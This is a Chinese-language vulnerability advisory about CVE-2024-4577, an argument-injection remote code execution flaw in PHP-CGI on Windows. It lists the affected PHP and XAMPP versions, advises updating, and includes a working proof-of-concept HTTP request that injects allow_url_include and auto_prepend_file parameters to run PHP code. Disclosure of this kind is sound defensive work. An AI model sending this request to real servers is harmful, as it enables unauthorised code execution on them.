PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)

admin
admin
admin
140350
文章
117
评论
2024年6月20日19:22:23评论20 views字数 1149阅读3分49秒阅读模式

PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)

PHP-CGI Windows平台存在远程代码执行漏洞

(CVE-2024-4577)

PHP是Hypertext Preprocessor(超文本预处理器)的缩写,现是一种广泛使用的开源的脚本语言,它特别适合Web开发和嵌入HTML中,使用起来很简单。

CGI,英文叫做公共网关接口,就是Apache在遇到PHP脚本时会将PHP程序提交给CGI应用程序(php-cgi.exe)解释,解释之后的结果返回给Apache,然后再返回给相应的请求用户。

01 漏洞描述

漏洞类型:远程代码执行漏洞(RCE)

简述:在 Windows 平台上运行 PHP-CGI 模式且使用特定语系的 PHP 存在代码注入漏洞。攻击者可以通过构造恶意请求绕过 CVE-2012-1823 补丁,注入恶意的 CGI 模式命令参数,从而在服务器上执行任意 PHP 代码。

PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)

漏洞POC:
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 21User-Agent: curl/8.3.0Accept: */*Content-Length: 21Content-Type: application/x-www-form-urlencodedConnection: keep-alive<?phpphpinfo();?>

02 漏洞影响版本

PHP Windows版 8.3.0 <= 影响版本 < 8.3.8

PHP Windows版 8.2.0 <= 影响版本 < 8.2.20
PHP Windows版 8.1.0 <= 影响版本 < 8.1.29
PHP Windows版 影响版本 == 8.0.x
PHP Windows版 影响版本 == 7.x
PHP Windows版 影响版本 == 5.x
XAMPP Windows版 8.2.0 <= 影响版本 <= 8.2.12
XAMPP Windows版 8.1.0 <= 影响版本 <= 8.1.25
XAMPP Windows版 影响版本 == 8.0.x
XAMPP Windows版 影响版本 == 7.x
XAMPP Windows版 影响版本 == 5.x

03 漏洞修复方案

建议用户尽快更新到安全版本,或者应用最新的安全补丁。

04 参考链接

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability/

https://www.cnblogs.com/sesmof/p/18239068

END

PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)

原文始发于微信公众号(锋刃科技):PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月20日19:22:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP-CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)http://cn-sec.com/archives/2847930.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息